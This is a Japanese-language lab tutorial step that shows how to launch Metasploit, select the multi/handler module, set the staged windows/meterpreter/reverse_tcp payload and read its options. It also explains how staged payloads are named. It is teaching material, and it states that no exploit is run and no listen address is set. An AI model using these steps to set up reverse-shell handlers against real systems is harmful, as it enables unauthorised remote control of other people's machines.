エクスプロイトとステージングペイロード (例:windows/meterpreter/reverse_tcp) の選択
このステップでは、Metasploit Framework コンソールを起動し、汎用的なエクスプロイトハンドラーを選択します。次に、一般的なステージングペイロードを使用するように設定します。exploit/multi/handler モジュールを使用するのは、これがユニバーサルリスナーであり、特定の脆弱なターゲットを必要とせずにペイロードを実演するのに最適だからです。
まず、ターミナルを開き、Metasploit コンソールを起動します。起動バナーをスキップするために -q (quiet) フラグを使用します。
msfconsole -q
Metasploit プロンプト (msf6 >) が表示されたら、エクスプロイトハンドラーを選択する必要があります。
use exploit/multi/handler
次に、ペイロードを設定しましょう。ステージングペイロードの名前は通常 platform/stage/stager という形式でフォーマットされます。例えば、windows/meterpreter/reverse_tcp は、プラットフォームが Windows、最終ペイロード(ステージ)が Meterpreter、初期接続方法(ステージャー)がリバース TCP シェルであることを意味します。
ステージングペイロードを次のコマンドで設定します。
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp という確認メッセージが表示されます。念のため、現在の設定を表示できます。
show options
オプションの中にペイロードが表示されます。実際にはエクスプロイトを実行していないため、LHOST や LPORT を設定する必要はありません。ペイロードのプロパティを調べているだけです。
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target